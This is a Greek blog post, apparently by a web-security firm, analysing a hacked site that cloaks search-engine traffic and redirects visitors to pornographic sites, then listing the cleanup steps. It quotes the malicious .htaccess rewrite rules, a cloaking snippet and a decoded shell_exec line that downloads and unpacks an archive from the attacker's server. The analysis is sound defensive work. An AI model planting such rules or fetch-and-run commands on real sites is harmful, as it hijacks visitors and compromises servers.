Blackhat SEO σε μια ιστοσελίδα

Μπορεί η ιστοσελίδα σας να ανακατευθύνει τους επισκέπτες της σε μη επιθυμητά site; Τι μεθόδους χρησιμοποιούν οι επιτήδειοι, για να μετατρέψουν έναν ιστότοπο σε μηχανή παραγωγής διαφημίσεων; Πως το αντιμετωπίσαμε.

Ας δούμε τα συμπτώματα:
–    Όταν κάποιος κανεί κλικ στο αποτέλεσμα αναζήτησης σε κάποια υπηρεσία αναζήτησης (Google, Bing, Yahoo) ανακατευθύνεται σε ιστοσελίδες πορνογραφικού περιεχομένου. Σε όλες τις άλλες περιπτώσεις (direct access) εμφανίζεται κανονικά η ιστοσελίδα.
–    Μόνο οι πραγματικά υφιστάμενες σελίδες της ιστοσελίδας ανακατευθύνονται. Δεν δημιουργούνται doorways (όπως δημιουργούνται σε περιπτώσεις spam).
–    Δεν ανακατευθύνουν όλες οι υποσελίδες σε παράνομα sites, αλλά όσες το κάνουν, το κάνουν πάντα.
–    Όταν κάποιος ελέγχει τον κώδικα της ιστοσελίδας, δεν θα παρατηρήσει τίποτα ασυνήθιστο.

 

 

 

.htaccess

Τέτοιου είδους συμπτώματα έχουν ισχυρή υπόβαθρο ότι πρέπει να εξετασθεί το πρόβλημα σε εντελώς αρχικό στάδιο και μάλιστα σε επίπεδο server.
Για παράδειγμα, το παρακάτω βρέθηκε στο .htaccess αρχείο του server σε ιστοσελίδα που ζητήθηκε η συνδρομή μας για να την βοηθήσουμε.

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ – [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ authentically-familiar.php?$1 [L]

Εάν «διαβάσει» κάποιος τον παραπάνω κώδικα πολύ απλά θακαταλάβει ότι όλα τα request στον server που προέρχονται από μηχανές αναζήτησης, ανακατευθύνονται σε ένα doorway script (του οποίου το όνομα διαφέρει σε κάθε περίπτωση αλλά πάντα είναι αυτοματοποιημένος συνδυασμός λέξεων από λεξικό όπως για παράδειγμα bray-anointing.php, biomedical-case.php, ellipsoidal-cruisers.php κλπ).

 

Doorway Script

Ας δούμε όμως τι υπάρχει μέσα σε αυτό το script.

doorway script

Σαν ένα τυπικό cloacking script που είναι, εμφανίζει διαφορετικό περιεχόμενο σε ανθρώπους και μηχανές αναζήτησης αλλά με αντίστροφη φορά. Δηλαδή εμφανίζει κανονικά ιστοσελίδα σε ανθρώπους και 404 ιστοσελίδα (δηλαδή σελίδα που δεν υπάρχει στον server) στις μηχανές αναζήτησης.

 

Doorway Data

Αποκρυπτογραφώντας το script, ανακαλύπτουμε ότι περιέχεται ένας τελεστής οποίος δίνει εντολή να «κατέβουν» συγκεκριμένες εντολές από τον server του hacker.

$cmd=”cd $tmppath; wget http://update.$domain/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz”;

echo shell_exec($cmd);

Οι εντολές εμφανίζουν συγκεκριμένα urls και όχι όλες τις υποσελίδες της ιστοσελίδας ως στόχο του doorway.

 

 

Περίεργα Doorway Extensions

Ξέροντας από το παραπάνω ότι ο hacker επιλέξει τα urls που θα λειτουργήσουν ως doorways προσπαθήσαμε να καταλάβουμε γιατί δεν χρησιμοποιήθηκαν απλά urls αλλά επιλέχθηκε να «κατεβαίνουν» pdf και word αρχεία.
Η εξήγηση υπάρχει στις επόμενες γραμμές κώδικα.

if ($bot) {
$pdf+=0;
if ($pdf==1){ header(“Content-Type: application/pdf”); }
if ($pdf==2){header(“Content-Type: image/png”); }
if ($pdf==3){header(“Content-Type: text/xml”); }
if ($pdf==4){
$contenttype=@base64_decode($contenttype);
$types=explode(“\n”,$contenttype);
foreach($types as $val){
$val=trim($val);
if($val!=””)header($val);
}}
echo $doorcontent;exit;
}

Προφανώς έγινε με την ελπίδα ότι το Google δεν θα θεωρίσει αυτά τα αρχεία και τα links που περιέχουν ως spam!

 

Ανακατευθύνσεις σε ακατάλληλες ιστοσελίδες

Αντιθέτως με τα spam hackαρίσματα, τα οποία cache-άρονται στον server και μπορεί να ανανεώνονται από καιρό εις καιρό, σε αυτή την περίπτωση όλες οι εντολές ανακατεύθυνσης σε ακατάλληλες ιστοσελίδες, «φορτώνονταν» από τον server του hacker.

redirect code

Με αυτό τον τρόπο, δίνονταν η δυνατότητα στον hacker να συλλέγει στατιστικά στοιχεία από τις doorways και να αλλάζει τα urls της ανακατεύθυνσης κατά το δοκούν, επιλέγοντας τις υποσελίδες που έχουν μεγαλύτερη επισκεψιμότητα!

 

Backdoors

Δυστυχώς όμως υπήρχε και συνέχεια!!! Η ανακατεύθυνση με την χρήση του .htaccess αρχείου του server δεν ήταν η μοναδική που χρησιμοποιήθηκε από τους hackers. Σε υποφακέλους της εγκατάστασης της ιστοσελίδας, βρέθηκαν διάφορα διπλά αρχεία τα ονόματα των οποίων ακολουθούσαν αυτό το pattern
word1-word2.php
όπου στα word1 και word2 υπήρχαν διάφορες Αγγλικές λέξεις, χωρίς κάποιο νόημα επιλογής.
Όλα αυτά τα αρχεία ήταν backdoors που εκτελούσαν κώδικα php ο οποίος στη συνέχεια «περνούσε» στα HTTP headers της ιστοσελίδας!

backdoor type

 

Το αίσιο τέλος

Βρήκαμε και διαγράψαμε όλα τα backdoors
Αφαιρέσαμε των παράνομο κώδικα από το .htaccess
Βρήκαμε και διαγράψαμε όλα τα doorways script
Δόθηκε εντολή αλλαγής σε όλα τα password της ιστοσελίδας
Δόθηκε εντολή αναβάθμισης σε όλα τα στοιχεία της ιστοσελίδας

TOP

Inquiry